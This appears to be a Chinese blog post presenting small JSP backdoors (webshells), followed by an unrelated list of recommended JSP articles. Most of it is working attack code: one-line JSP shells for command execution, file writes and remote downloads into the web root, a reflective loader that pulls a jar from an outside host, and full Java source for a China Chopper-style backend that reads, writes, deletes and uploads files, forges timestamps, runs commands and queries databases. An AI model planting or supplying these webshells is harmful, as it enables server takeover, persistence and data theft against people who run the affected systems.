jsp小后门

一:执行系统命令:

无回显执行系统命令:

1
<%Runtime.getRuntime().exec(request.getParameter( "i" ));%>

请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls

执行之后不会有任何回显,用来反弹个shell很方便。

有回显带密码验证的:

1
2
3
4
5
6
7
8
9
10
11
12
<%
     if ( "023" .equals(request.getParameter( "pwd" ))){
         java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter( "i" )).getInputStream();
         int a = - 1 ;
         byte [] b = new byte [ 2048 ];
         out.print( "<pre>" );
         while ((a=in.read(b))!=- 1 ){
             out.println( new String(b));
         }
         out.print( "</pre>" );
     }
%>

请求:http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

二、把字符串编码后写入指定文件的:

1:

1
<% new java.io.FileOutputStream(request.getParameter( "f" )).write(request.getParameter( "c" ).getBytes());%>

请求:http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

写入web目录:

1
<% new java.io.FileOutputStream(application.getRealPath( "/" )+ "/" +request.getParameter( "f" )).write(request.getParameter( "c" ).getBytes());%>

请求:http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234

2:

1
<% new java.io.RandomAccessFile(request.getParameter( "f" ), "rw" ).write(request.getParameter( "c" ).getBytes()); %>

请求:http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

写入web目录:

1
<% new java.io.RandomAccessFile(application.getRealPath( "/" )+ "/" +request.getParameter( "f" ), "rw" ).write(request.getParameter( "c" ).getBytes()); %>

请求:http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234

三:下载远程文件(不用apache io utils的话没办法把inputstream转byte,所以很长…)

 
<%
     java.io.InputStream in = new java.net.URL(request.getParameter( "u" )).openStream();
     byte [] b = new byte [ 1024 ];
     java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
     int a = - 1 ;
     while ((a = in.read(b)) != - 1 ) {
         baos.write(b, 0 , a);
     }
     new java.io.FileOutputStream(request.getParameter( "f" )).write(baos.toByteArray());
%>

请求:http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png

下载到web路径:

0
<%
     java.io.InputStream in = new java.net.URL(request.getParameter( "u" )).openStream();
     byte [] b = new byte [ 1024 ];
     java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
     int a = - 1 ;
     while ((a = in.read(b)) != - 1 ) {
         baos.write(b, 0 , a);
     }
     new java.io.FileOutputStream(application.getRealPath( "/" )+ "/" + request.getParameter( "f" )).write(baos.toByteArray());
%>

请求:http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png

四:反射调用外部jar,完美后门

如果嫌弃上面的后门功能太弱太陈旧可以试试这个:

1
<%=Class.forName( "Load" , true , new java.net.URLClassLoader( new java.net.URL[]{ new java.net.URL(request.getParameter( "u" ))})).getMethods()[ 0 ].invoke( null , new Object[]{request.getParameterMap()})%>

请求:http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

菜刀连接:http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar,密码023.

解:

利用反射加载一个外部的jar到当前应用,反射执行输出处理结果。request.getParameterMap()包含了请求的所有参数。由于加载的是外部的jar包,所以要求服务器必须能访问到这个jar地址。

下载:Cat.jar

Load代码:

 
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;
 
/*
  * To change this license header, choose License Headers in Project Properties.
  * To change this template file, choose Tools | Templates
  * and open the template in the editor.
  */
/**
  *
  * @author yz
  */
public class Load {
     
     public static String load(Map<String,String[]> map){
         try {
             Map<String,String> request = new HashMap<String,String>();
             for (Entry<String, String[]> entrySet : map.entrySet()) {
                 String key = entrySet.getKey();
                 String value = entrySet.getValue()[ 0 ];
                 request.put(key, value);
             }
             return new Chopper().doPost(request);
         } catch (IOException ex) {
             return ex.toString();
         }
     }
     
}

Chopper代码:

 
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.lang.reflect.Method;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLClassLoader;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.ResultSetMetaData;
import java.sql.Statement;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.Map;
 
public class Chopper{
 
     public static String getPassword() throws IOException {
         return "023" ;
     }
 
     String cs = "UTF-8" ;
 
     String encoding(String s) throws Exception {
         return new String(s.getBytes( "ISO-8859-1" ), cs);
     }
 
     Connection getConnection(String s) throws Exception {
         String[] x = s.trim().split( "\r\n" );
         try {
             Class.forName(x[ 0 ].trim());
         } catch (ClassNotFoundException e) {
             boolean classNotFound = true ;
             BufferedReader br = new BufferedReader( new InputStreamReader( this .getClass().getResourceAsStream( "/map.txt" )));
             String str = "" ;
             while ((str = br.readLine()) != null ) {
                 String[] arr = str.split( "=" );
                 if (arr.length == 2 && arr[ 0 ].trim().equals(x[ 0 ].trim())) {
                     try {
                         URLClassLoader ucl = (URLClassLoader) ClassLoader.getSystemClassLoader();
                         Method m = URLClassLoader. class .getDeclaredMethod( "addURL" , URL. class );
                         m.setAccessible( true );
                         m.invoke(ucl, new Object[]{ new URL(arr[ 1 ])});
                         Class.forName(arr[ 0 ].trim());
                         classNotFound = false ;
                         break ;
                     } catch (ClassNotFoundException ex) {
                         throw ex;
                     }
                 }
             }
             if (classNotFound) {
                 throw e;
             }
         }
         if (x[ 1 ].contains( "jdbc:oracle" )) {
             return DriverManager.getConnection(x[ 1 ].trim() + ":" + x[ 4 ],
                     x[ 2 ].equalsIgnoreCase( "[/null]" ) ? "" : x[ 2 ],
                     x[ 3 ].equalsIgnoreCase( "[/null]" ) ? "" : x[ 3 ]);
         } else {
             Connection c = DriverManager.getConnection(x[ 1 ].trim(),
                     x[ 2 ].equalsIgnoreCase( "[/null]" ) ? "" : x[ 2 ],
                     x[ 3 ].equalsIgnoreCase( "[/null]" ) ? "" : x[ 3 ]);
             if (x.length > 4 ) {
                 c.setCatalog(x[ 4 ]);
             }
             return c;
         }
     }
 
     void listRoots(ByteArrayOutputStream out) throws Exception {
         File r[] = File.listRoots();
         for (File f : r) {
             out.write((f.getName()).getBytes(cs));
         }
     }
 
     void dir(String s, ByteArrayOutputStream out) throws Exception {
         File l[] = new File(s).listFiles();
         for (File f : l) {
             String mt = new SimpleDateFormat( "yyyy-MM-dd HH:mm:ss" ).format( new Date(f.lastModified()));
             String rw = f.canRead() ? "R" : "" + (f.canWrite() ? " W" : "" );
             out.write((f.getName() + (f.isDirectory() ? "/" : "" ) + "\t" + mt + "\t" + f.length() + "\t" + rw + "\n" ).getBytes(cs));
         }
     }
 
     void deleteFiles(File f) throws Exception {
         if (f.isDirectory()) {
             File x[] = f.listFiles();
             for (File fs : x) {
                 deleteFiles(fs);
             }
         }
         f.delete();
     }
 
     byte [] readFile(String s) throws Exception {
         int n;
         byte [] b = new byte [ 1024 ];
         BufferedInputStream bis = new BufferedInputStream( new FileInputStream(s));
         ByteArrayOutputStream bos = new ByteArrayOutputStream();
         while ((n = bis.read(b)) != - 1 ) {
             bos.write(b, 0 , n);
         }
         bis.close();
         return bos.toByteArray();
     }
 
     void upload(String s, String d) throws Exception {
         String h = "0123456789ABCDEF" ;
         File f = new File(s);
         f.createNewFile();
         FileOutputStream os = new FileOutputStream(f);
         for ( int i = 0 ; i < d.length(); i += 2 ) {
             os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1 ))));
         }
         os.close();
     }
 
     void filesMove(File sf, File df) throws Exception {
         if (sf.isDirectory()) {
             if (!df.exists()) {
                 df.mkdir();
             }
             File z[] = sf.listFiles();
             for (File z1 : z) {
                 filesMove( new File(sf, z1.getName()), new File(df, z1.getName()));
             }
         } else {
             FileInputStream is = new FileInputStream(sf);
             FileOutputStream os = new FileOutputStream(df);
             int n;
             byte [] b = new byte [ 1024 ];
             while ((n = is.read(b)) != - 1 ) {
                 os.write(b, 0 , n);
             }
             is.close();
             os.close();
         }
     }
 
     void fileMove(File s, File d) throws Exception {
         s.renameTo(d);
     }
 
     void mkdir(File s) throws Exception {
         s.mkdir();
     }
 
     void setLastModified(File s, String t) throws Exception {
         s.setLastModified( new SimpleDateFormat( "yyyy-MM-dd HH:mm:ss" ).parse(t).getTime());
     }
 
     void downloadRemoteFile(String s, String d) throws Exception {
         int n = 0 ;
         FileOutputStream os = new FileOutputStream(d);
         HttpURLConnection h = (HttpURLConnection) new URL(s).openConnection();
         InputStream is = h.getInputStream();
         byte [] b = new byte [ 1024 ];
         while ((n = is.read(b)) != - 1 ) {
             os.write(b, 0 , n);
         }
         os.close();
         is.close();
         h.disconnect();
     }
 
     void inputStreamToOutPutStream(InputStream is, ByteArrayOutputStream out) throws Exception {
         int i = - 1 ;
         byte [] b = new byte [ 1024 ];
         while ((i = is.read(b)) != - 1 ) {
             out.write(b, 0 , i);
         }
     }
 
     void getCurrentDB(String s, ByteArrayOutputStream out) throws Exception {
         Connection c = getConnection(s);
         ResultSet r = s.contains( "jdbc:oracle" ) ? c.getMetaData().getSchemas() : c.getMetaData().getCatalogs();
         while (r.next()) {
             out.write((r.getObject( 1 ) + "\t" ).getBytes(cs));
         }
         r.close();
         c.close();
     }
 
     void getTableName(String s, ByteArrayOutputStream out) throws Exception {
         Connection c = getConnection(s);
         String[] x = s.trim().split( "\r\n" );
         ResultSet r = c.getMetaData().getTables( null , s.contains( "jdbc:oracle" ) ? x.length > 5 ? x[ 5 ] : x[ 4 ] : null , "%" , new String[]{ "TABLE" });
         while (r.next()) {
             out.write((r.getObject( "TABLE_NAME" ) + "\t" ).getBytes(cs));
         }
         r.close();
         c.close();
     }
 
     void getTableColumn(String s, ByteArrayOutputStream out) throws Exception {
         String[] x = s.trim().split( "\r\n" );
         Connection c = getConnection(s);
         ResultSet r = c.prepareStatement( "select * from " + x[x.length - 1 ]).executeQuery();
         ResultSetMetaData d = r.getMetaData();
         for ( int i = 1 ; i <= d.getColumnCount(); i++) {
             out.write((d.getColumnName(i) + " (" + d.getColumnTypeName(i) + ")\t" ).getBytes(cs));
         }
         r.close();
         c.close();
     }
 
     void executeQuery(String cs, String s, String q, ByteArrayOutputStream out, String p) throws Exception {
         Connection c = getConnection(s);
         Statement m = c.createStatement( 1005 , 1008 );
         BufferedWriter bw = null ;
         try {
             boolean f = q.contains( "--f:" );
             ResultSet r = m.executeQuery(f ? q.substring( 0 , q.indexOf( "--f:" )) : q);
             ResultSetMetaData d = r.getMetaData();
             int n = d.getColumnCount();
             for ( int i = 1 ; i <= n; i++) {
                 out.write((d.getColumnName(i) + "\t|\t" ).getBytes(cs));
             }
             out.write(( "\r\n" ).getBytes(cs));
             if (f) {
                 File file = new File(p);
                 if (!q.contains( "-to:" )) {
                     file.mkdir();
                 }
                 bw = new BufferedWriter( new OutputStreamWriter( new FileOutputStream( new File(q.contains( "-to:" ) ? p.trim() : p + q.substring(q.indexOf( "--f:" ) + 4 , q.length()).trim()), true ), cs));
             }
             while (r.next()) {
                 for ( int i = 1 ; i <= n; i++) {
                     if (f) {
                         bw.write(r.getObject(i) + "" + "\t" );
                         bw.flush();
                     } else {
                         out.write((r.getObject(i) + "" + "\t|\t" ).getBytes(cs));
                     }
                 }
                 if (bw != null ) {
                     bw.newLine();
                 }
                 out.write(( "\r\n" ).getBytes(cs));
             }
             r.close();
             if (bw != null ) {
                 bw.close();
             }
         } catch (Exception e) {
             out.write(( "Result\t|\t\r\n" ).getBytes(cs));
             try {
                 m.executeUpdate(q);
                 out.write(( "Execute Successfully!\t|\t\r\n" ).getBytes(cs));
             } catch (Exception ee) {
                 out.write((ee.toString() + "\t|\t\r\n" ).getBytes(cs));
             }
         }
         m.close();
         c.close();
     }
 
     public String doPost(Map<String,String>request) throws IOException {
         cs = request.get( "z0" ) != null ? request.get( "z0" ) + "" : cs;
         ByteArrayOutputStream out = new ByteArrayOutputStream();
         try {
             char z = ( char ) request.get(getPassword()).getBytes()[ 0 ];
             String z1 = encoding(request.get( "z1" ) + "" );
             String z2 = encoding(request.get( "z2" ) + "" );
             out.write( "->|" .getBytes(cs));
             String s = new File( "" ).getCanonicalPath();
             byte [] returnTrue = "1" .getBytes(cs);
             switch (z) {
                 case 'A' :
                     out.write((s + "\t" ).getBytes(cs));
                     if (!s.substring( 0 , 1 ).equals( "/" )) {
                         listRoots(out);
                     }
                     break ;
                 case 'B' :
                     dir(z1, out);
                     break ;
                 case 'C' :
                     String l = "" ;
                     BufferedReader br = new BufferedReader( new InputStreamReader( new FileInputStream( new File(z1))));
                     while ((l = br.readLine()) != null ) {
                         out.write((l + "\r\n" ).getBytes(cs));
                     }
                     br.close();
                     break ;
                 case 'D' :
                     BufferedWriter bw = new BufferedWriter( new OutputStreamWriter( new FileOutputStream( new File(z1))));
                     bw.write(z2);
                     bw.flush();
                     bw.close();
                     out.write(returnTrue);
                     break ;
                 case 'E' :
                     deleteFiles( new File(z1));
                     out.write( "1" .getBytes(cs));
                     break ;
                 case 'F' :
                     out.write(readFile(z1));
                 case 'G' :
                     upload(z1, z2);
                     out.write(returnTrue);
                     break ;
                 case 'H' :
                     filesMove( new File(z1), new File(z2));
                     out.write(returnTrue);
                     break ;
                 case 'I' :
                     fileMove( new File(z1), new File(z2));
                     out.write(returnTrue);
                     break ;
                 case 'J' :
                     mkdir( new File(z1));
                     out.write(returnTrue);
                     break ;
                 case 'K' :
                     setLastModified( new File(z1), z2);
                     out.write(returnTrue);
                     break ;
                 case 'L' :
                     downloadRemoteFile(z1, z2);
                     out.write(returnTrue);
                     break ;
                 case 'M' :
                     String[] c = {z1.substring( 2 ), z1.substring( 0 , 2 ), z2};
                     Process p = Runtime.getRuntime().exec(c);
                     inputStreamToOutPutStream(p.getInputStream(), out);
                     inputStreamToOutPutStream(p.getErrorStream(), out);
                     break ;
                 case 'N' :
                     getCurrentDB(z1, out);
                     break ;
                 case 'O' :
                     getTableName(z1, out);
                     break ;
                 case 'P' :
                     getTableColumn(z1, out);
                     break ;
                 case 'Q' :
                     executeQuery(cs, z1, z2, out, z2.contains( "-to:" ) ? z2.substring(z2.indexOf( "-to:" ) + 4 , z2.length()) : s.replaceAll( "\\\\" , "/" ) + "images/" );
                     break ;
             }
         } catch (Exception e) {
             out.write(( "ERROR" + ":// " + e.toString()).getBytes(cs));
         }
         out.write(( "|<-" ).getBytes(cs));
         return new String(out.toByteArray());
     }
 
}

map.txt:

 
oracle.jdbc.driver.OracleDriver=http: //p2j.cn/jdbc/classes12.jar
com.mysql.jdbc.Driver=http: //p2j.cn/jdbc/mysql-connector-java-5.1.14-bin.jar
com.microsoft.jdbc.sqlserver.SQLServerDriver=http: //p2j.cn/jdbc/sqlserver2000/msbase.jar,http://p2j.cn/jdbc/sqlserver2000/mssqlserver.jar,http://p2j.cn/jdbc/sqlserver2000/msutil.jar
com.microsoft.sqlserver.jdbc.SQLServerDriver=http: //p2j.cn/jdbc/sqljdbc4.jar
com.ibm.db2.jcc.DB2Driver=http: //p2j.cn/jdbc/db2java.jar
com.informix.jdbc.IfxDriver=http: //p2j.cn/jdbc/ifxjdbc.jar
com.sybase.jdbc3.jdbc.SybDriver=http: //p2j.cn/jdbc/jconn3d.jar
org.postgresql.Driver=http: //p2j.cn/jdbc/postgresql-9.2-1003.jdbc4.jar
com.ncr.teradata.TeraDriver=http: //p2j.cn/jdbc/teradata-jdbc4-14.00.00.04.jar
com.hxtt.sql.access.AccessDriver=http: //p2j.cn/jdbc/Access_JDBC30.jar
org.apache.derby.jdbc.ClientDriver=http: //p2j.cn/jdbc/derby.jar
org.hsqldb.jdbcDriver=http: //p2j.cn/jdbc/hsqldb.jar
net.sourceforge.jtds.jdbc.Driver=http: //p2j.cn/jdbc/jtds-1.2.5.jar
mongodb=http: //p2j.cn/jdbc/mongo-java-driver-2.9.3.jar

你可能感兴趣的:(jsp)

  • SpringMVC的执行流程
    1、什么是MVCMVC是一种设计模式。MVC的原理图如下所示M-Model模型(完成业务逻辑:有javaBean构成,service+dao+entity)V-View视图(做界面的展示jsp,html……)C-Controller控制器(接收请求—>调用模型—>根据结果派发页面2、SpringMVC是什么SpringMVC是一个MVC的开源框架,SpringMVC=Struts2+Spring,
  • 深入理解 Tomcat Wrapper 原理 北漂老男人 Tomcattomcatjava
    深入理解TomcatWrapper原理一、引言在Tomcat的分层容器架构中,Wrapper作为最底层的容器,专门负责管理单个Servlet的生命周期及请求分发。每一个Servlet(包括JSP、Filter等)都对应一个Wrapper。Wrapper是Servlet规范与Tomcat容器实现之间的桥梁,直接关系到请求的分发效率、Servlet的加载与重用、安全隔离等。本文将系统剖析Wrapper
  • 大学社团管理系统(11831) codercode2022 javaspringbootspringechartsspringcloudsentineljava-rocketmq
    有需要的同学,源代码和配套文档领取,加文章最下方的名片哦一、项目演示项目演示视频二、资料介绍完整源代码(前后端源代码+SQL脚本)配套文档(LW+PPT+开题报告)远程调试控屏包运行三、技术介绍Java语言SSM框架SpringBoot框架Vue框架JSP页面Mysql数据库IDEA/Eclipse开发四、项目截图有需要的同学,源代码和配套文档领取,加文章最下方的名片哦!
  • JSP编程从入门到精通:现代Web开发与AI集成实战指南 AI编程员 001AI传统&编程语言002AI编程工具汇总003AI编程作品汇总人工智能AI编程笔记开发语言深度学习
    JSP编程从入门到精通:现代Web开发与AI集成实战指南一、JSP基础与环境搭建1.1JSP核心概念与工作原理JSP(JavaServerPages)是一种动态网页开发技术,通过在HTML中嵌入Java代码实现服务器端逻辑。其本质是Servlet的扩展,当客户端首次请求JSP页面时,服务器会将其编译为Servlet类(如index_jsp.java),再执行该类的_jspService()方法生成
  • Java Web开发核心技术解析与实践指南 2301_81709812 java前端开发语言
    目录一、JavaWeb开发基础1.1核心概念解析1.2开发环境搭建二、Servlet与JSP核心技术2.1Servlet编程深度解析生命周期管理(关键代码示例):核心对象关系:2.2JSP进阶开发技巧动态页面模板示例:三、Spring框架整合开发3.1SpringMVC核心原理3.2现代开发方案对比四、项目实战:图书管理系统4.1系统架构设计4.2性能优化策略五、学习路线建议一、JavaWeb开发
  • 基于Spring Boot的网上订餐系统设计与实现 不若浮生一梦 计算机毕设springboot后端java
    一、项目简介随着生活节奏加快,传统线下订餐逐渐不能满足人们对效率和便利的需求,网上订餐成为趋势。为了提升用户体验并优化商家运营管理,我开发了一套基于SpringBoot的网上订餐系统,实现用户在线浏览菜品、下单、查询配送,管理员可后台管理订单、菜品、会员等功能模块。本系统采用流行的SpringBoot框架,结合JSP技术开发前端页面,MySQL作为后台数据库,支持B/S架构下的完整订餐流程,具有界
  • SpringMVC——请求参数与请求头
    获取请求参数一、@RequestParam获取jsp实例testRequestParamprivatestaticfinalStringSUCCESS="success";@RequestMapping(value="/testRequestParam")publicStringtestRequestParam(@RequestParam(value="username")Stringuserna
  • JAVA在国企应用中如何实现大文件上传? 路过了忘了 java开发语言java大文件上传java大文件秒传java大文件上传下载java文件传输解决方案jsp大文件上传
    军工利刃出鞘:破解100G涉密文件传输难题初春的挑战2025年3月的北京仍带着料峭寒意,军工研究院的会议室里却气氛灼热。大屏幕上跳动着红色警示:“政府单位100G涉密文件传输需求——现有系统兼容性评估:0%”。作为项目总工,我盯着这个刺眼的数字,指尖无意识地摩挲着茶杯边缘。"传统方案最多支持20G文件传输。"技术总监老张推了推眼镜,"而且我们的JSP框架是十年前基于Struts2搭建的,要兼容现代
  • JAVA HTTP大文件分片断点续传 weixin_52041354 java大文件上传java大文件秒传java大文件上传下载java文件传输解决方案jsp大文件上传java断点续传jsp加密传输
    要求:开源,免费,技术支持技术:分片,分块,断点续传,加密传输,加密存储需求:大文件上传,批量上传,断点续传,文件夹上传,大文件下载,批量下载,断点下载,文件夹下载文件夹:上传下载需要支持层级结构,采用非压缩方式文件大小:100G前端:vue2,vue3,vue-cli,jquery,html,webuploader后端:java,JSP,springboot,struts服务器:linux,信创
  • WEB安全--Java安全--jsp webshell免杀
    1.1、BCELClassLoader介绍(仅适用于BCEL6.0以下):BCEL(ApacheCommonsBCEL™)是一个用于分析、创建和操纵Java类文件的工具库;BCEL的类加载器在解析类名时会对ClassName中有BCEL标识的类做特殊处理,该特性经常被用于编写各类攻击Payload。当BCEL的loadClass加载一个类名中带有BCEL$$”的类时会截取出BCEL后面的字符串,然
  • 【计算机本科毕业论文鸿蒙系统选题】最新颖的鸿蒙系统毕业设计选题汇总100套易过的精品毕设项目分享(建议收藏)✅
    文章目录前言最新毕设选题(建议收藏起来)最新颖的鸿蒙系统毕业设计选题汇总100套易过的精品毕设项目分享毕设作品推荐文未可免费咨询毕设相关问题,点赞留言可送系统源码前言2025全新毕业设计项目博主介绍:✌全网粉丝10W+,CSDN全栈领域优质创作者,博客之星、掘金/华为云/阿里云等平台优质作者。技术范围:SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫
  • 《web结构反思报告》郑耀辉 fc6ea61498f0
    在这11月份我学习了jsp技术。了解了各种标识和注释和out、request、response、session、application等内置对象及JDBC。在JSP中主要包含3种指令,分别是page指令(页面指令)、include指令和taglib指令。\n\n\u003C%@指令名称属性1=\"属性值\"属性2=\"属性值\"…%>。想要熟悉的运用这些知识我需要更加努力的学习,让学到的知识成为我
  • cjui3w.dll cjsts3w.dll cjstd3w.dll cjsrw3w.dll cjspl3w.dll cjrimg3w.dll cjres3w.dll a***0738 游戏windows
    在使用电脑系统时经常会出现丢失找不到某些文件的情况,由于很多常用软件都是采用MicrosoftVisualStudio编写的,所以这类软件的运行需要依赖微软VisualC++运行库,比如像QQ、迅雷、Adobe软件等等,如果没有安装VC++运行库或者安装的版本不完整,就可能会导致这些软件启动时报错,提示缺少库文件。如果我们遇到关于文件在系统使用过程中提示缺少找不到的情况,如果文件是属于运行库文件的
  • 微信推客带货小程序开发实战
    一、项目概述微信推客带货小程序是一种基于微信生态的社交电商解决方案,通过分享裂变模式帮助商家快速推广商品。本文将介绍如何从零开始开发一个基础的推客带货小程序,包含核心功能实现代码。二、开发准备1.注册微信小程序开发者账号2.安装微信开发者工具3.创建小程序项目,选择JavaScript基础模板三、核心功能实现1.商品列表展示```javascript//pages/goods/list.jsPag
  • springboot基于Web手工艺品销售系统的开发与实现(11786) codercode2022 springboot后端java开发语言rabbitmqspringspringcloud
    有需要的同学,源代码和配套文档领取,加文章最下方的名片哦一、项目演示项目演示视频二、资料介绍完整源代码(前后端源代码+SQL脚本)配套文档(LW+PPT+开题报告)远程调试控屏包运行三、技术介绍Java语言SSM框架SpringBoot框架Vue框架JSP页面Mysql数据库IDEA/Eclipse开发四、项目截图有需要的同学,源代码和配套文档领取,加文章最下方的名片哦!
  • 2026计算机毕设选题推荐【千次实战】【万条选题】
    计算机毕业设计选题推荐,包括但不限于软件工程、计算机科学与技术等专业适用。主要包括:Java、SSM、Python、小程序方向选题推荐。历经千次实战选出万条选题,必有一条适合你!!题目参考:SpringBoot选题SSM选题微信小程序选题1基于SpringBoot的在线拍卖系统1高校专业信息管理系统设计与实现+jsp1基于微信小程序的购物系统设计与实现+ssm2基于SpringBoot的医护人员排
  • python 搭建web_webpy搭建一个简单的网站
    首先,我们要从http://www.webpy.org站点下载最新的框架源代码,将下载过来的tar压缩的包解压,你会得到一个webpy文件夹,我们所需要的一切都包含在里面了。其次,安装webpy(这个要注意一下,Python的Web开发不同于PHP/ASP/JSP等,不要用传统的思维来约束自己),在window终端下运行如下命令:pythonsetup.pyinstall(在我本机如下:E:\wo
  • Java EE前端技术编程脚本语言JavaScript
    -CoderOilStation(程序员编程助手科技股份责任有限公司)JavaEE前端技术编程脚本语言JavaScript低代码编程技术编写少量的代码规则。JavaScript脚本编程语言具体细节配置方式编程。前端技术过渡web3.0企业数字化。JavaServicePage(JSP)JavaEEjdk6.5发布企业应用版本Java研发团队发布的jstl(Javastandardtaglibrar
  • 计算机专业毕业设计(论文+源码)_kiac
    基于微信小程序的时钟管理系统设计与开发基于Java的校园生活服务系统的设计与实现基于安卓平台的个人理财软件的设计与实现基于JavaScript的旧书交易网站系统设计与实现基于STM32G431的数字密码锁的设计与实现基于JSP的在线英语考试系统的设计与实现基于JavaScript的音游网站的设计与实现基于Java的单机拼图游戏的设计与实现基于Java的课程微视频网站的设计与实现基于Web的多媒体素
  • 快速将前端得依赖打为tar包(yarn.lock版本)并且推送至nexus私有依赖仓库(笔记) 职场马喽 前端
    第一步创建js文件文件名为downloadNpmPackage.jsprocess.env.NODE_TLS_REJECT_UNAUTHORIZED="0";constfs=require("fs");constpath=require("path");constrequest=require("request");//设置依赖目录constdownUrl="./npm-dependencies-
  • vue3 antd modal对话框里的前端html导出成pdf并下载 清岚_lxn vue3pdfvue3html2canvasjspdf
    1.安装html2canvas和jspdf:npminstallhtml2canvasjspdf2.新建exportToPDF.tsimporthtml2canvasfrom'html2canvas';importjsPDFfrom'jspdf';constexportToPDF=async(element,filename='export.pdf')=>{constpdf=newjsPDF('p
  • Tomcat和nginx结合使用 xiaoweiwei11 tomcatnginxjava
    前言Tomcat和Nginx是两个不同的服务器软件,它们在Web应用部署中扮演着不同的角色。Tomcat是一个JavaServlet容器,它用于运行JavaWeb应用程序。它可以处理HTTP请求并将其传递给Java应用程序进行处理。Tomcat提供了一个容器,用于加载、执行和管理JavaServlet、JavaServerPages(JSP)和其他JavaWeb技术。相比之下,Nginx是一个高性
  • 熬之滴水穿石:JSP--HTML中的JAVA代码(1)
    33--JSP的由来说实话,在B/S系统中我并没有多少前端开发的经验。03年由C/S转B/S后曾有那么短暂的时间写前台用过JSP。但大部分时间从事后台的开发,等04年当上项目经理后基本没有搞过Web页面的开发了。这些工作都是留给我的团队开发的,但是不管角色怎么变,对于技术上的理解和追求始终没变!03年JSPJavaBean开发应用系统,到06年时已经是Web2.0的时代了,07年还用了JSF。有些
  • web登录注册页面 m0_67391518 面试学习路线阿里巴巴前端javahtmlmysql数据库
    目录web登录注册页面效果图结构图Java代码User.javaUserMapper.javaIndexServlet.javaRegisterServlet.javaDButil.javaxml配置文件mybatis-config.xmldb.propertiesweb.xmlhtml与cssindex.jspindex.cssregister.htmlregister.css文章目录web登录
  • 简单WEB登录页面代码实现 逆流的飞鱼 简单代码java
    longin.html:登录页面,此处action引用**/**类型的地址,JSP可以用${pageContext.request.contextPath}/LS用户名:密码:LoginServlet.java用户和前台WEB页面数据进行交互packageit.tongyou.web.servlet;importjava.io.IOException;importjava.io.PrintWrit
  • 12306系统架构的演进
    演进过程12306系统架构的演进是中国铁路信息化建设的重要里程碑,其核心围绕高并发处理、数据一致性保障、跨地域容灾三大挑战展开。以下是其分阶段的技术演进过程:第一阶段:单机架构与双机热备(2011年)背景2011年上线初期,12306仅支持京津城际列车购票,日均售票量不足百万。系统采用传统单体架构,依赖小型机和集中式数据库,缺乏分布式设计。架构特点技术栈:JavaServlet+JSP+Sybas
  • 【Java代码审计 | 第五篇】XSS漏洞成因+实战案例 秋说 Java代码审计javaxss
    未经许可,不得转载。文章目录XSS漏洞成因1、直接输出用户输入2、在JSP中使用EL表达式输出用户输入3、在Thymeleaf模板中输出用户输入4、在JavaScript中嵌入用户输入实战案例案例1案例2案例3XSSXSS(跨站脚本攻击,Cross-SiteScripting)是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,使得这些脚本在用户的浏览器中执行。XSS攻击通常分为以下三种类
  • 关于Ajax的学习笔记 秋也凉 ajax学习笔记
    Ajax概念:是一门使用了js语言,可以使用于Javaweb,实现前端代码和后端代码连结的的一种异步同步(不需要等待服务器相应,就能够发送第二次请求)的一种技术,它主要用于网页内容的局部刷新,列如验证码、导航栏的刷新等。实现步骤1.导入jQuery(一种框架,Ajax是JQuery的一种方法)文件——例如:写在jsp页面的标签里面。2.在jsp页面写一个函数,然后在函数里面调用ajax方法,aja
  • python爬虫-国家企业信用信息公示系统_GitHub - yong771/Crack-JS: Python3爬虫项目进阶实战、JS加解密、逆向教程 - 犀牛数据 | 美团美食 | 企名片 | 七麦... 日向夕阳
    Crack-JSPython3爬虫实战、JS加解密、逆向教程犀牛数据|美团美食|企名片|七麦数据|淘大象|梦幻西游藏宝阁|漫画柜|财联社|中国空气质量在线监测分析平台|66ip代理|零度ip|国家企业信用信息公示系统|中国产品大目录Author咸鱼微信公众号咸鱼学PythonIntroduce数据解密、反爬处理、逆向教程一、代码配套说明目录JS解密案例│├──lingduip//-----零度ip
  • java毕业设计-基于Javaweb的家常小菜烹饪学习管理系统的设计与实现(源码+LW+部署文档+全bao+远程调试+代码讲解等) 程序猿刘 vuespringboot毕业设计java课程设计学习
    博主介绍:✌️码农一枚,专注于大学生项目实战开发、讲解和毕业文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战✌️技术范围::小程序、SpringBoot、SSM、JSP、Vue、PHP、Java、python、爬虫、数据可视化、大数据、物联网、机器学习等设计与开发。主要内容:免费开题报告、任务书、全bao定制+
  • ViewController添加button按钮解析。(翻译) 张亚雄 c
    <div class="it610-blog-content-contain" style="font-size: 14px"></div>//  ViewController.m //  Reservation software // //  Created by 张亚雄 on 15/6/2.
  • mongoDB 简单的增删改查 开窍的石头 mongodb
       在上一篇文章中我们已经讲了mongodb怎么安装和数据库/表的创建。在这里我们讲mongoDB的数据库操作       在mongo中对于不存在的表当你用db.表名 他会自动统计 下边用到的user是表明,db代表的是数据库       添加(insert):
  • log4j配置 0624chenhong log4j
